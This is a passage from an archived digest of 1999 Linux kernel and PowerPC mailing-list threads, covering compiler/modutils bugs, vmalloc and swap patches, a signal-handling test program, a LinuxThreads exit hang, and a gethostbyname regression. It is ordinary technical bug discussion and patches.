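    *loc = apply_rel32(v, dot);
}
```

A target below the patched word comes out as a large unsigned value, which
is the same bit pattern as the negative offset.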



^ permalink raw reply	[relevance 64%]

* Re: egcs-1.1.1-1c bug (was Re: major ksyms problem)
  1999-02-23 21:15 64%       ` Franz Sirl
  1999-02-24  9:53 64%         ` Gary Thomas
@ 1999-02-24 18:40 64%         ` Tom Vier
  1 sibling, 0 replies; 200+ results
From: Tom Vier @ 1999-02-24 18:40 UTC (permalink / raw)
  To: Franz Sirl; +Cc: Franz Sirl, mklinux-development-system, linuxppc-dev


On Tue, 23 Feb 1999, Franz Sirl wrote:

> >it is an egcs bug. egcs-1.1.1-1c fails to build working bsd_comp.o,
> >ppp_deflate.o, and hfs.o; egcs-1.0-2e.ppc.rpm builds it perfectly. i'm
> >getting a newer build of egcs right now, to see if it's fixed.
> 
> What is the problem with these modules? Give a better description on what you
> mean with "working"? They work perfectly for me with a self-compiled 2.2.1
> kernel, and I compiled working modules with multiple kernel versions since the
> egcs-1.1 alpha phase.
> If your only problem is the "unhandled relocation type", install a newer
> modutils package (>=2.1.121), that will fix it.

yup, that fixed it. 8) i wonder what changed in egcs between 1.0 and
1.1.1 that makes the problem arise.

--
Tom Vier - 0x82B007A8
thomass@erols.com        | goto the Zero Page at:
Tortured Souls Software  | http://www.erols.com/thomassr/zero/



^ permalink raw reply	[relevance 64%]

* Re: PATCH - bug in vfree
  1999-02-20 11:46 62% PATCH - bug in vfree Neil Booth
  1999-02-20 12:14 64% ` Neil Booth
  1999-02-22 20:31 64% ` Kanoj Sarcar
@ 1999-02-25  0:47 64% ` Andrea Arcangeli
  2 siblings, 0 replies; 200+ results
From: Andrea Arcangeli @ 1999-02-25  0:47 UTC (permalink / raw)
  To: Neil Booth; +Cc: linux-mm

On Sat, 20 Feb 1999, Neil Booth wrote:

>I posted this bug on the kernel mailing list last year, but it never got
>fixed, probably as I didn't include a patch. I attach a patch this time

I included it one year ago in my tree and in fact if you grab my
arca-patches you'll find it again ;).

>against kernel 2.2.1. The bug is rare, but can lead to kernel virtual
>memory corruption.

Hmm, when I checked it one year ago I didn't see a way the bug could
corrupt memory.

>More deeply:- Close inspection of get_vm_area reveals that
>(intentionally?) it does NOT insist there be a cushion page behind a VMA
>that is placed in front of a previously-allocated VMA, it ONLY

Could you explain this better? I agree that there's no good reason to try to
free the gap-faulting page, but I don't see how there could fail to be a
page-gap between two vmalloced areas.

Andrea Arcangeli


^ permalink raw reply	[relevance 64%]

* Re: egcs-1.1.1-1c bug (was Re: major ksyms problem)
  1999-02-24  9:53 64%         ` Gary Thomas
  1999-02-24 16:06 64%           ` Franz Sirl
@ 1999-02-25  2:20 64%           ` Tom Vier
  1 sibling, 0 replies; 200+ results
From: Tom Vier @ 1999-02-25  2:20 UTC (permalink / raw)
  To: Gary Thomas; +Cc: linuxppc-dev, mklinux-development-system


On Wed, 24 Feb 1999, Gary Thomas wrote:

> Sadly he can't use that modutils package as it's only for 2.1.xx and 2.2.xx
> kernels.
> 
> Tom,  Can you try the 2.2.xx kernels and see if they work for you?  This would
> be a much better way to spend your time rather than looking after a quite old
> kernel.

actually modutils 2.1.121 works, except of course for kerneld. 8)
unfortunately, linuxppc won't (yet) run on my 7100/80 and mk doesn't
(yet) run 2.2.x

--
Tom Vier - 0x82B007A8
thomass@erols.com        | goto the Zero Page at:
Tortured Souls Software  | http://www.erols.com/thomassr/zero/




[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* signal handling bug demo....
@ 1999-02-25 11:39 57% D.J. Barrow
  0 siblings, 0 replies; 200+ results
From: D.J. Barrow @ 1999-02-25 11:39 UTC (permalink / raw)
  To: linuxppc-dev, Gary Thomas, Lauro Whately

[-- Attachment #1: Type: text/plain, Size: 1528 bytes --]

Here is a demonstration of the bug I described in earlier mails about signals being lost by the kernel.
I am now quite sure the bug will manifest itself in all variants of Linux unless the signal dispatching has changed radically. The code is, I believe, POSIX compliant (thanks, Lauro).

The bug arises when (sig)longjmp gets called out of a signal handler: sys_sigreturn doesn't get called, and the signals queued on the user stack get trashed.


To Demo:
Put parent.c, child.c and testmake in the same
directory. Compile using testmake, then run parent.
Note "the bug": only one signal gets delivered per loop of the child.

I believe this bug can be fixed by simplifying the kernel. There is no reason (that I'm aware of) to queue the signals on the user stack: sys_sigreturn gets called in the kernel for every signal delivered, so this queueing is fundamentally a braindamaged idea.


I believe the bug can be fixed by:
1) Removing the while loop in do_signal.
2) Removing the current sys_sigreturn.
3) Making do_signal also function as sys_sigreturn.
4) Removing handle_signal.
5) Unblocking the signal before delivering it (this would also enable longjmp out of signal handlers to behave correctly) rather than leaving the signal blocked forever.

So now do_signal will get called for each signal delivered. The thing would be a lot more stable, use less user stack, and remove ~200 lines of really crap code.






[-- Attachment #2: child.c --]
[-- Type: application/octet-stream, Size: 284 bytes --]

#include <stdio.h>
#include <signal.h>
#include <unistd.h>   /* getppid(), sleep() */

int main(int argc,char *argv[])
{
   int cnt;
   printf("In child\n");
   for(cnt=0;cnt<30;cnt++)
   {
      printf("looping in child\n");
      /* send two signals back to back to the parent */
      kill(getppid(),SIGUSR1);
      kill(getppid(),SIGUSR2);
      sleep(1);
   }
   return 0;
}

[-- Attachment #3: parent.c --]
[-- Type: application/octet-stream, Size: 634 bytes --]

#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <unistd.h>   /* fork(), execlp(), getpid(), sleep() */
#include <signal.h>
#include <setjmp.h>

sigjmp_buf genv;

/* leaves the handler via siglongjmp instead of returning normally */
void mysignal(int sig)
{
  printf("received signal %d\n",sig);
  siglongjmp(genv,1);
}


int main(int argc,char *argv[])
{
  int childpid;

  signal(SIGUSR1,mysignal);
  signal(SIGUSR2,mysignal);
  if((childpid=fork())==-1)
  {
      printf("fork failed\n");
      exit(-1);
  }
  else if(childpid==0)
  {
      printf("execlping child pid=%d\n",getpid());
      if(execlp("./child","./child",(char *)0)==-1)
      {
	 printf("execlp failed\n");
	 exit(-1);
      }
  }
  /* save the signal mask too, so siglongjmp restores it */
  sigsetjmp(genv,1);
  for(;;)
  {
    printf("looping in parent\n");
    sleep(1);
  }
}

[-- Attachment #4: testmake --]
[-- Type: application/octet-stream, Size: 107 bytes --]

gcc -D__USE_BSD_SIGNAL -D__USE_BSD child.c -o child
gcc -D__USE_BSD_SIGNAL -D__USE_BSD  parent.c -o parent

^ permalink raw reply	[relevance 57%]

* Bug in G3 serial - stty causes total lockup
@ 1999-02-26 16:13 64% puetzk6715
  0 siblings, 0 replies; 200+ results
From: puetzk6715 @ 1999-02-26 16:13 UTC (permalink / raw)
  To: linuxppc-dev


I just moved my printer from a LocalTalk network to my Linux box. I then
BootX'ed into Linux (1.0.2b4 and Paul's 2.2.1) to try the HP 660C
instructions from the FAQ-o-Matic. However, attempting to use stty raw
57600 -echo crtscts < /dev/ttyS1 completely locked up the machine. I
rebooted (OF-boot), and all worked fine. Went back to MacOS, BootX'ed (I
wanted to see if this was the problem), and... it locked up again. 

I finally turned off LocalTalk on the MacOS (which I was going to do
anyway now that the printer is directly connected) and now stty works
reliably after BootX. However, I don't like Linux to crash, even in
unrealistic situations (like changing the speed on a port MacOS thought
was LocalTalk). Anyone want to look at this? I'm afraid of the
kernel code...



^ permalink raw reply	[relevance 64%]

* Re: PATCH - bug in vfree
  1999-02-20 12:14 64% ` Neil Booth
@ 1999-02-27  2:39 64%   ` Neil Booth
  0 siblings, 0 replies; 200+ results
From: Neil Booth @ 1999-02-27  2:39 UTC (permalink / raw)
  To: linux-mm, Andrea Arcangeli

Andrea Arcangeli wrote:

> Hmm, when I checked it one year ago I didn't see a way the bug could
> corrupt memory.

Yes, you missed my retraction of that bit below.

Neil.

Neil Booth wrote:
> 
> Neil Booth wrote:
> 
> > More deeply:- Close inspection of get_vm_area reveals that
> > (intentionally?) it does NOT insist there be a cushion page behind a VMA
> > that is placed in front of a previously-allocated VMA, it ONLY
> > guarantees that a cushion page lies in front of newly-allocated VMAs.
> 
> Sorry, this is not correct (mistook < for <=). The bug report is
> correct, though.
> 
> Neil.

^ permalink raw reply	[relevance 64%]

* Re: bug in arch/ppc/mm/init.c
  1999-01-30 15:05 64% bug in arch/ppc/mm/init.c Loic Prylli
@ 1999-03-03  5:19 64% ` Paul Mackerras
  0 siblings, 0 replies; 200+ results
From: Paul Mackerras @ 1999-03-03  5:19 UTC (permalink / raw)
  To: Loic.Prylli; +Cc: linuxppc-dev


Loic Prylli <Loic.Prylli@ens-lyon.fr> wrote:

> The init functions of some drivers use ioremap, which may call
> MMU_get_page (if the target zone crosses a 4-Mbyte boundary). But
> MMU_get_page is marked as an initfunc, so it is no longer
> present -> panic.

You're right, MMU_get_page shouldn't be an initfunc.

> Here one possible solution:
> 
> --- arch/ppc/mm/init.c~ Thu Jan  7 21:06:57 1999
> +++ arch/ppc/mm/init.c  Sat Jan 30 16:01:17 1999
> @@ -883,7 +883,7 @@
>         }           
>  }
>  
> -__initfunc(static void *MMU_get_page(void))
> +static void *MMU_get_page(void)
>  {
>         void *p;
>  

Looks good to me.

Paul.


^ permalink raw reply	[relevance 64%]

* [linux-lvm] Bug in the Major number increments?
@ 1999-03-31 20:14 64% FryarD
  0 siblings, 0 replies; 200+ results
From: FryarD @ 1999-03-31 20:14 UTC (permalink / raw)
  To: linux-lvm



In experimenting with LVM on RH5.2 I noticed that every time I create the first
two logical volumes they get the exact same major number. This results in one of
the volumes not being valid or mountable. I have not examined it enough yet; however, I
suspect that the increment i++ is incorrectly using the same number before
incrementing. Any thoughts? Is there something I am missing? Also, it might be a
good idea to add a line to the makefile to create /etc/lvmtab.d. I fiddled
around with LVM for a while getting invalid protocol before discovering that you
had to create this directory by hand before it would work.
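
To illustrate the suspicion about i++: in C a post-increment expression
yields the old value of the counter, so a reader that looks at the counter
without advancing it, followed by one that uses i++, ends up with the same
number twice. The sketch below is not taken from the LVM sources;
assign_two_buggy and assign_two_fixed are hypothetical names used only to
show the pattern.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical illustration only, not LVM code. */

/* Buggy pattern: the first slot reads the counter without advancing it,
   the second uses post-increment, so both slots see the same value. */
void assign_two_buggy(int *counter, int out[2])
{
    assert(counter != NULL);
    out[0] = *counter;       /* counter is not advanced here */
    out[1] = (*counter)++;   /* yields the same old value, then advances */
}

/* Fixed pattern: every slot consumes one value from the counter. */
void assign_two_fixed(int *counter, int out[2])
{
    assert(counter != NULL);
    out[0] = (*counter)++;
    out[1] = (*counter)++;
}
```

Starting from a counter of 5, the buggy variant hands out 5 and 5, while
the fixed variant hands out 5 and 6.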


TIA
Dexter Fryar

^ permalink raw reply	[relevance 64%]

* Bug in LinuxThreads?
@ 1999-04-01 15:18 53% Charles A. Jolley
  1999-04-01 18:57 64% ` Kevin B. Hendricks
  0 siblings, 1 reply; 200+ results
From: Charles A. Jolley @ 1999-04-01 15:18 UTC (permalink / raw)
  To: linuxppc-dev


Hi all:
    I apologize if this is too off topic, but I am trying to figure out
where to go in order to get this problem fixed and this listserv seemed to
be the best place.  A few days ago I posted the attached message below to
the comp.programming.threads newsgroup in relation to a problem I've been
having running a piece of threaded code I've written on a standard R4
installation (running the 2.1.125 kernel).  The issue is described in detail
below.

    I have had a few responses back from people telling me they compiled the
included code on an Intel box and it worked fine.  This leads me to believe
there might be a bug in the pthreads or kernel (probably pthreads) code that
is causing the problem.  My question: is there an update that I have missed,
or whom do I need to contact to work on getting this thing fixed?  I don't
mind working on finding the bug myself, I'm just not even sure of where I
can find the pthreads source code for LinuxPPC!

Thanks,
-Charles

-------------------------------------------------ATTACHED MESSAGE--------

Hi,

I have been trying to write a program that involves a thread pool which,
over the course of the operation of the program, will create and exit
several threads.  I am finding that if I have exited any threads during
the program run, then it hangs upon exiting from main().  [Specifically,
GDB shows it hanging in the function pthread_exit_process(), which is
called automatically by the tear-down code, I presume.]

I can't figure out why it is doing this and if there is anything that I
need to do or if it is a bug in this version or what.  I am currently
running the 4.2 release of LinuxPPC (2.1.125 kernel, based on the 5.0
RedHat release) with libc6 and egcs (so when I use C++, this should not
be a problem) and I am doing the normal _REENTRANT/-lpthreads linking
thing.

I have included some code below that will cause the problem to occur
when compiled.  Any help is greatly appreciated.

Thanks,
-Charles

----
NON-FUNCTIONAL CODE
Compiled with "gcc -D_REENTRANT -s -o buggy1 buggy1.c -lpthreads"

--NOTE THE LINE TO UNCOMMENT THAT WILL MAKE THE PROGRAM "WORK"; i.e. it
will now exit normally, but this is obviously not a real fix.--

----

/* --- Messed up Threading Code Begins --- */

#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <unistd.h>   /* sleep() */

void *thread_routine(void *arg)
{
/*      while(1) ; //Uncomment this (so thread doesn't die) and proc exits! */
        return (void*)3 ;
}

int main ()
{
        pthread_t thread_id ;
        void *thread_result ;
        int status ;

        status = pthread_create(
                &thread_id, NULL, thread_routine, NULL) ;
        if (status!=0) {
                printf("Create Thread!\n") ;
                exit(1) ;
        }

        status = pthread_detach(thread_id) ;
        if (status!=0) {
                printf("Detach Thread!\n") ;
                exit(1) ;
        }

        /* give the detached thread time to finish before main returns */
        sleep(1) ;
        return 1 ;
}

/* --- Messed up Thread Code Ends --- */

[[ This message was sent via the linuxppc-dev mailing list.  Replies are ]]
[[ not  forced  back  to the list, so be sure to Cc linuxppc-dev if your ]]
[[ reply is of general interest. Please check http://lists.linuxppc.org/ ]]
[[ and http://www.linuxppc.org/ for useful information before posting.   ]]

^ permalink raw reply	[relevance 53%]

* Re: Bug in LinuxThreads?
  1999-04-01 15:18 53% Bug in LinuxThreads? Charles A. Jolley
@ 1999-04-01 18:57 64% ` Kevin B. Hendricks
  0 siblings, 0 replies; 200+ results
From: Kevin B. Hendricks @ 1999-04-01 18:57 UTC (permalink / raw)
  To: Charles A. Jolley; +Cc: linuxppc-dev


Hi,

I ran your test program under R4.1 and with the very latest glibc 1.99 rpm from
Gary Thomas and it worked fine. (exited properly)

By the way, your comment in the code about how to compile is wrong (it is
libpthread.so NOT libpthreads.so), so use -lpthread, not -lpthreads.

I have made a few changes to linuxthreads to improve performance with the JDK
1.2 native threads.  Please try with Gary's latest glibc 1.99 rpm (which has
libpthread in it).  If that doesn't work, I will post my libpthread.so and
libpthread.a for you to try.

If only my version works for you, I will post the diffs for you and you can roll
your own.

I hope this helps.

Kevin


^ permalink raw reply	[relevance 64%]

* HAL2 spec bug
@ 1999-04-06 16:31 64% Ulf Carlsson
  0 siblings, 0 replies; 200+ results
From: Ulf Carlsson @ 1999-04-06 16:31 UTC (permalink / raw)
  To: Linux SGI

The DMA noise problem was actually a specification bug. I should not configure
cfgdma as a 16 bit device as the specification explicitly tells me to do. If
it's configured for 16 bit DMA transfers, the low 8 bits are just dumped or
replaced with noise if they differ from the upper 8 bits.

It's kind of hard to write a decent driver when the spec lies to me..

- Ulf

^ permalink raw reply	[relevance 64%]

* boundary condition bug fix for vmalloc()
@ 1999-04-22  0:12 64% Kanoj Sarcar
  1999-04-22 15:30 64% ` Patch: " Stephen C. Tweedie
  0 siblings, 1 reply; 200+ results
From: Kanoj Sarcar @ 1999-04-22  0:12 UTC (permalink / raw)
  To: Linux-MM, linux-kernel

Hi,

Under heavy load conditions, get_vm_area() might end up allocating an
address range beyond VMALLOC_END. The problem is after the for loop
in get_vm_area() terminates, no consistency check (addr > VMALLOC_END
- size) is performed on the "addr". 

I believe the following patch will fix the problem:

--- vmalloc.old		Wed Apr 21 16:52:05 1999
+++ mm/vmalloc.c	Wed Apr 21 16:53:08 1999
@@ -161,11 +161,11 @@
        for (p = &vmlist; (tmp = *p) ; p = &tmp->next) {
                if (size + addr < (unsigned long) tmp->addr)
                        break;
+               addr = tmp->size + (unsigned long) tmp->addr;
                if (addr > VMALLOC_END-size) {
                        kfree(area);
                        return NULL;
                }
-               addr = tmp->size + (unsigned long) tmp->addr;
        }
        area->addr = (void *)addr;
        area->size = size + PAGE_SIZE;
 
Please let me know if this patch is pulled into the source tree, 
so I can update my tree.

Thanks.

Kanoj
kanoj@engr.sgi.com

^ permalink raw reply	[relevance 64%]

* Patch: Re: boundary condition bug fix for vmalloc()
  1999-04-22  0:12 64% boundary condition bug fix for vmalloc() Kanoj Sarcar
@ 1999-04-22 15:30 64% ` Stephen C. Tweedie
  0 siblings, 0 replies; 200+ results
From: Stephen C. Tweedie @ 1999-04-22 15:30 UTC (permalink / raw)
  To: Kanoj Sarcar, Linus Torvalds, Alan Cox; +Cc: Linux-MM, linux-kernel

Hi,

On Wed, 21 Apr 1999 17:12:37 -0700 (PDT), kanoj@google.engr.sgi.com
(Kanoj Sarcar) said:

> Under heavy load conditions, get_vm_area() might end up allocating an
> address range beyond VMALLOC_END. The problem is after the for loop in
> get_vm_area() terminates, no consistency check (addr > VMALLOC_END -
> size) is performed on the "addr".

Agreed, and the patch looks OK.  Moving the test outside the for loop
entirely has the same effect while shaving a few cycles off the
function.  The existing code is clearly broken in not checking the size of the
final area if we ran off the end of the vm_area chain.
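
As a rough userspace illustration of why one test after the loop is
enough, here is a minimal sketch of the same first-fit search. It is not
kernel code: sim_area, SIM_VMALLOC_START, SIM_VMALLOC_END and
sim_find_addr are hypothetical stand-ins for vm_struct, the VMALLOC_*
constants and the search in get_vm_area(), and the address values are
made up.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-ins for the kernel's constants and vm_struct. */
#define SIM_VMALLOC_START 0x1000UL
#define SIM_VMALLOC_END   0x9000UL

struct sim_area {
    unsigned long addr;
    unsigned long size;
    struct sim_area *next;   /* list is sorted by ascending addr */
};

/* Returns the start address for a new area of `size` bytes,
   or 0 if it would not fit below SIM_VMALLOC_END. */
unsigned long sim_find_addr(const struct sim_area *list, unsigned long size)
{
    unsigned long addr = SIM_VMALLOC_START;
    const struct sim_area *tmp;

    /* keeps SIM_VMALLOC_END - size from wrapping around */
    assert(size > 0 && size <= SIM_VMALLOC_END - SIM_VMALLOC_START);

    for (tmp = list; tmp != NULL; tmp = tmp->next) {
        if (size + addr < tmp->addr)
            break;                      /* the gap before tmp is big enough */
        addr = tmp->size + tmp->addr;   /* otherwise skip past tmp */
    }

    /* One check after the loop covers both exits: breaking out early
       and running off the end of the list. */
    if (addr > SIM_VMALLOC_END - size)
        return 0;
    return addr;
}
```

With a single area occupying 0x1000..0x8000, a request for 0x2000 bytes
runs off the end of the list with addr == 0x8000 and is rejected by the
final test; a request for 0x1000 bytes still fits.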

--Stephen

----------------------------------------------------------------
--- mm/vmalloc.c~	Mon Jan 18 18:19:28 1999
+++ mm/vmalloc.c	Thu Apr 22 16:12:58 1999
@@ -161,11 +161,11 @@
 	for (p = &vmlist; (tmp = *p) ; p = &tmp->next) {
 		if (size + addr < (unsigned long) tmp->addr)
 			break;
-		if (addr > VMALLOC_END-size) {
-			kfree(area);
-			return NULL;
-		}
 		addr = tmp->size + (unsigned long) tmp->addr;
+	}
+	if (addr > VMALLOC_END-size) {
+		kfree(area);
+		return NULL;
 	}
 	area->addr = (void *)addr;
 	area->size = size + PAGE_SIZE;
----------------------------------------------------------------

^ permalink raw reply	[relevance 64%]

* [BUG] in glibc-2.1.1-6b: gethostbyname broken
@ 1999-05-08 12:20 63% Martin Costabel
  1999-05-09 22:20 64% ` Franz Sirl
  0 siblings, 1 reply; 200+ results
From: Martin Costabel @ 1999-05-08 12:20 UTC (permalink / raw)
  To: linuxppc-dev; +Cc: Tom Rini

[-- Attachment #1: Type: text/plain, Size: 632 bytes --]


Under glibc-2.1.1-6b, I cannot do an NFS-mount using the numeric IP
address of the server. Without even consulting the net, mount says:
  mount: can't get address for xx.xx.xx.xx

Under glibc-2.1.1-5b, it works correctly.

I tracked this down to gethostbyname, which doesn't work correctly when
fed a numeric IP address.

If I run the attached program as
 tstgethbn 193.252.19.78 
I get a correct result when glibc-2.1.1-5b.ppc.rpm is installed, and an
error when glibc-2.1.1-6b.ppc.rpm is installed. Both rpms are from
mirror.linuxppc.org.

Could someone who knows what changed between 5b and 6b please look into
this?

Martin

[-- Attachment #2: tstgethbn.c --]
[-- Type: text/plain, Size: 890 bytes --]

/* tstgethbn.c
   Test for gethostbyname */

#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <string.h>   /* strncpy() */
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
 
int main(int argc, char** argv)
{
   char hostname[65];
   struct hostent *he = NULL;
   struct hostent *he2 = NULL;
 
   if ( argc < 2 ) {
       fprintf(stderr, "usage: %s hostname-or-address\n", argv[0]);
       exit(1);
   }

   /* bounded copy so a long argument cannot overflow hostname[] */
   strncpy(hostname, argv[1], sizeof(hostname) - 1);
   hostname[sizeof(hostname) - 1] = '\0';
   printf( " Looking up %s\n", hostname );
 
   he = gethostbyname(hostname);
   if ( he == NULL ){
       /* h_errno is only meaningful after a failed lookup */
       printf(" error %d\n", h_errno);
       herror(hostname);
       printf("No hostname found\n");
       exit(1);
   }

   printf( "\t      Hostname: %s\n", he->h_name );
 
   if ( he->h_addr_list[0] != NULL )
     printf("\t       Address: %s \n", 
	    inet_ntoa(*(struct in_addr *) he->h_addr_list[0]));

   he2 = gethostbyaddr( he->h_addr_list[0], he->h_length, he->h_addrtype );
   if ( he2 != NULL )
       printf( "\t          Name: %s\n", he2->h_name );
   else
       herror("gethostbyaddr");

   exit(0);
}
  

^ permalink raw reply	[relevance 63%]

* Re: [BUG] in glibc-2.1.1-6b: gethostbyname broken
  1999-05-08 12:20 63% [BUG] in glibc-2.1.1-6b: gethostbyname broken Martin Costabel
@ 1999-05-09 22:20 64% ` Franz Sirl
  0 siblings, 0 replies; 200+ results
From: Franz Sirl @ 1999-05-09 22:20 UTC (permalink / raw)
  To: Martin Costabel, linuxppc-dev; +Cc: Tom Rini


On Sat, 08 May 1999, Martin Costabel wrote:
>>
>Under glibc-2.1.1-6b, I cannot do an NFS-mount using the numeric IP
>address of the server. Without even consulting the net, mount says:
>  mount: can't get address for xx.xx.xx.xx
>
>Under glibc-2.1.1-5b, it works correctly.
>
>I tracked this down to gethostbyname, which doesn't work correctly when
>fed a numeric IP address.
>
>If I run the attached program as
> tstgethbn 193.252.19.78 
>I get a correct result when glibc-2.1.1-5b.ppc.rpm is installed, and an
>error when glibc-2.1.1-6b.ppc.rpm is installed. Both rpms are from
>mirror.linuxppc.org.
>
>Could someone who knows what changed between 5b and 6b please look into
>this?

Fixed in glibc-2.1.1-6c. This was a general bug in glibc-2.1.1pre2, I've
updated to a current glibc CVS snapshot which fixes it.

Thanks for your report.

Franz.


^ permalink raw reply	[relevance 64%]

* Indy SC bug
@ 1999-05-10 18:56 64% Ulf Carlsson
  0 siblings, 0 replies; 200+ results
From: Ulf Carlsson @ 1999-05-10 18:56 UTC (permalink / raw)
  To: Linux SGI

Hi all,

I've found a silly bug in the R4600SC caching routines. It wiped the whole cache
at wrap arounds even if you just tried to write back two cache lines (for
example the last cache line and the first cache line).

I can't understand how this bug has lasted so long in the kernel. Well, now that
I've sorted it out, your R4600SC machine should be A LOT faster.

- Ulf

^ permalink raw reply	[relevance 64%]

* Re: Swap Questions (includes possible bug) - swapfile.c / swap.c
       [not found]     <Pine.LNX.4.03.9905111114210.19954-100000@baltimore.wwaves.com>
@ 1999-05-11 21:30 61% ` Rik van Riel
  1999-05-12 15:42 58%   ` [PATCH] " Joseph Pranevich
  0 siblings, 1 reply; 200+ results
From: Rik van Riel @ 1999-05-11 21:30 UTC (permalink / raw)
  To: Joseph Pranevich; +Cc: Linux Kernel, Linux MM

On Tue, 11 May 1999, Joseph Pranevich wrote:

> I've been gradually sifting my way through the kernel source and I
> have a few minor questions about memory management.

linux-mm@kvack.org	(majordomo-managed)
http://www.linux.eu.org/Linux-MM/

> 1) swap.c : page clustering?

> 	else
> 		page_cluster = 4;
> 
> This is fine, but wouldn't it make sense to generalize this, or is
> the benefit not as great with larger amounts of RAM?

The swapOUT clustering is only done to a maximum of 32 (2^5)
pages, so it doesn't make much sense to read in more pages
(which are probably unrelated to the current process).

For mmap() reading we might want to switch to a smarter
algorithm though. Not with reading in more pages, but with
reading in the _next_ area while the program is still busy
processing this one. The idea is to have all data in memory
just before the process needs it :)


> 2) swapfile.c : sys_swapon() question 1
> 
> I'm unable to figure out exactly what this code is supposed to be
> doing. Can someone help me out here? I don't understand why we set
> the blocksize twice or what the funniness is with "filp"
> 
> 		p->swap_device = swap_dentry->d_inode->i_rdev;
> 		set_blocksize(p->swap_device, PAGE_SIZE);

We do I/O on this device in chunks of PAGE_SIZE.

> 		filp.f_dentry = swap_dentry;
> 		filp.f_mode = 3; /* read write */

Of course, we want to have our swap device read-write and we
mark it with a magic number so no harm will come to it...

> 		set_blocksize(p->swap_device, PAGE_SIZE);

Hmm, haven't we seen this one before? Stephen?


> I do apologise for the many questions, I'm just trying to get a
> feel for the swapping subsystem. I apologise if this is already
> documented someplace.

AFAIK it's not yet documented. I'd really appreciate it
if you could do that and send me the docs for inclusion
on the Linux-MM site...

cheers,

Rik -- Open Source: you deserve to be in control of your data.
+-------------------------------------------------------------------+
| Le Reseau netwerksystemen BV:               http://www.reseau.nl/ |
| Linux Memory Management site:   http://www.linux.eu.org/Linux-MM/ |
| Nederlandse Linux documentatie:          http://www.nl.linux.org/ |
+-------------------------------------------------------------------+


^ permalink raw reply	[relevance 61%]

* Re: Swap Questions (includes possible bug) - swapfile.c / swap.c
@ 1999-05-12 10:30 64% Manfred Spraul
  1999-05-12 18:36 64% ` Stephen C. Tweedie
  0 siblings, 1 reply; 200+ results
From: Manfred Spraul @ 1999-05-12 10:30 UTC (permalink / raw)
  To: Rik van Riel, Joseph Pranevich; +Cc: Linux Kernel, Linux MM

>On Tue, 11 May 1999, Joseph Pranevich wrote:
> case 2:
>  error = -EINVAL;
>  if (swap_header->info.nr_badpages > MAX_SWAP_BADPAGES)
>  goto bad_swap;

MAX_SWAP_BADPAGES is a limitation of the swap format 2,
it's not a kernel limitation. (check include/linux/swap.h)
 
Rik wrote:
>On Tue, 11 May 1999, Joseph Pranevich wrote:
>> set_blocksize(p->swap_device, PAGE_SIZE);
>
>Hmm, haven't we seen this one before? Stephen?


There is another problem with this line:
set_blocksize() also means that the previous block size
doesn't work anymore:
if you accidentally enter 'swapon /dev/hda1' (my root drive)
instead of 'swapon /dev/hda3', then you have to fsck:
sys_swapon sets the blocksize, then it rejects the call
because there is no swap signature, but now ext2
can't access the partition (blocksize 4096, ext2 needs 1024).
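
A rough userspace sketch of the ordering problem, under stated
assumptions: sim_dev, sim_swapon and the SIM_* constants are hypothetical
stand-ins, not the kernel's structures, and this is not the patch
mentioned below. It only shows the idea of refusing a busy device before
touching its block size, and of putting the old block size back when the
signature check fails.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-ins, not kernel definitions. */
#define SIM_PAGE_SIZE 4096
#define SIM_EBUSY     16
#define SIM_EINVAL    22

struct sim_dev {
    int blocksize;        /* current block size in bytes */
    int in_use;           /* nonzero if mounted or otherwise busy */
    char signature[11];   /* stand-in for the on-disk swap magic */
};

/* Returns 0 on success or a negative SIM_E* code; on any failure the
   device's block size is left as it was found. */
int sim_swapon(struct sim_dev *dev)
{
    int old_blocksize;

    assert(dev != NULL);

    /* Refuse busy devices before changing anything. */
    if (dev->in_use)
        return -SIM_EBUSY;

    old_blocksize = dev->blocksize;
    dev->blocksize = SIM_PAGE_SIZE;     /* swap I/O is done in page-sized chunks */

    if (strcmp(dev->signature, "SWAPSPACE2") != 0) {
        dev->blocksize = old_blocksize; /* undo the change on the error path */
        return -SIM_EINVAL;
    }
    return 0;
}
```

In this sketch a mounted ext2 partition with a 1024-byte block size is
rejected with -SIM_EBUSY and keeps its block size, and an unmounted
partition without a swap signature gets its 1024-byte block size back.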

I posted a patch a few weeks ago, but I received no reply.

Are such problems ignored? (The super user can crash the
machine at will, one more crash doesn't matter)

Regards,
    Manfred


^ permalink raw reply	[relevance 64%]

* [PATCH] Re: Swap Questions (includes possible bug) - swapfile.c / swap.c
  1999-05-11 21:30 61% ` Swap Questions (includes possible bug) - swapfile.c / swap.c Rik van Riel
@ 1999-05-12 15:42 58%   ` Joseph Pranevich
  0 siblings, 0 replies; 200+ results
From: Joseph Pranevich @ 1999-05-12 15:42 UTC (permalink / raw)
  To: Rik van Riel; +Cc: Linux MM

Hello,

Based on what was said below, does this make sense? In addition, I added
the case where we have >32 megs of RAM and we may want to change
page_cluster to 5 (which, if I understand your message, is the highest
that we could reasonably want it.)

We could, in theory, do this better and have it working on the fly based
on the swap out page cluster size as a maximum, but there doesn't appear
to be a benefit at this point. If however (and I haven't checked) the
maximum is architecture-dependent, it would definitely be advantageous to
generalize this further.

(I do have most of the code written to do that for my own personal
justification. But I don't yet check for an upper bound.)

Joe

--- swap.c.old	Tue May 11 17:42:02 1999
+++ swap.c	Wed May 12 09:29:49 1999
@@ -11,6 +11,7 @@
  * Started 18.12.91
  * Swap aging added 23.2.95, Stephen Tweedie.
  * Buffermem limits added 12.3.98, Rik van Riel.
+ * Additional documentation/code added 5.11.99, Joseph Pranevich
  */
 
 #include <linux/mm.h>
@@ -70,11 +71,31 @@
 
 void __init swap_setup(void)
 {
-	/* Use a smaller cluster for memory <16MB or <32MB */
+	/* The number for page_cluster can be approximately determined
+	   using the formula:
+
+		floor ( log2(M / 4) )
+
+	   Where M is the size of memory in megabytes.
+	
+	   However, the maximum page_cluster value for swapping out
+	   is 5, so it does not make sense to have a higher value here
+	   unless that is changed. We also do not ever want to have
+	   page_cluster be less than 2.
+
